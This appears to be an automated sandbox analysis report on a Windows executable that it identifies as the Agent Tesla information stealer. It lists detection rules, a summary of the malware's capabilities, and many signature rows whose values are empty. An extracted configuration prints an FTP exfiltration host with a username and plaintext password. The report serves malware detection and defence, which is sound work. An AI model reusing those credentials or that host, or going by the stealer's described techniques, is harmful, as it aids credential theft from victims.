Windows
Analysis Report
hesaphareketi-.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
hesaphareketi-.exe (PID: 6832 cmdline:
"C:\Users\ user\Deskt op\hesapha reketi-.ex e" MD5: 6EE05D4DD363D273CE38C497B1238DB1) hesaphareketi-.exe (PID: 3496 cmdline:
"C:\Users\ user\Deskt op\hesapha reketi-.ex e" MD5: 6EE05D4DD363D273CE38C497B1238DB1)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admin@normagroup.com.tr", "Password": "Qb.X[.j.Yfm["}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 9 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 16 entries |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | TCP traffic: |
Source: | File source: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | FTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Code function: | 2_2_067F8FC8 |
Source: | Windows user hook set: | Jump to behavior |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Long String: |
Source: | Process Stats: |
Source: | Code function: | 0_2_0275DAEC | |
Source: | Code function: | 2_2_029FE590 | |
Source: | Code function: | 2_2_029FAA98 | |
Source: | Code function: | 2_2_029F4A58 | |
Source: | Code function: | 2_2_029F3E40 | |
Source: | Code function: | 2_2_029FDD18 | |
Source: | Code function: | 2_2_029F4188 | |
Source: | Code function: | 2_2_029FAA93 | |
Source: | Code function: | 2_2_067F0274 | |
Source: | Code function: | 2_2_067FE3E8 | |
Source: | Code function: | 2_2_067F24F7 | |
Source: | Code function: | 2_2_067F1808 | |
Source: | Code function: | 2_2_067F1803 | |
Source: | Code function: | 2_2_06805590 | |
Source: | Code function: | 2_2_068065D8 | |
Source: | Code function: | 2_2_0680B218 | |
Source: | Code function: | 2_2_06802358 | |
Source: | Code function: | 2_2_0680C178 | |
Source: | Code function: | 2_2_06807D68 | |
Source: | Code function: | 2_2_06807688 | |
Source: | Code function: | 2_2_0680E390 | |
Source: | Code function: | 2_2_068083B0 | |
Source: | Code function: | 2_2_06800040 | |
Source: | Code function: | 2_2_06805CD8 | |
Source: | Code function: | 2_2_06800007 | |
Source: | Code function: | 2_2_06800537 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Static PE information: |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | File source: |
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
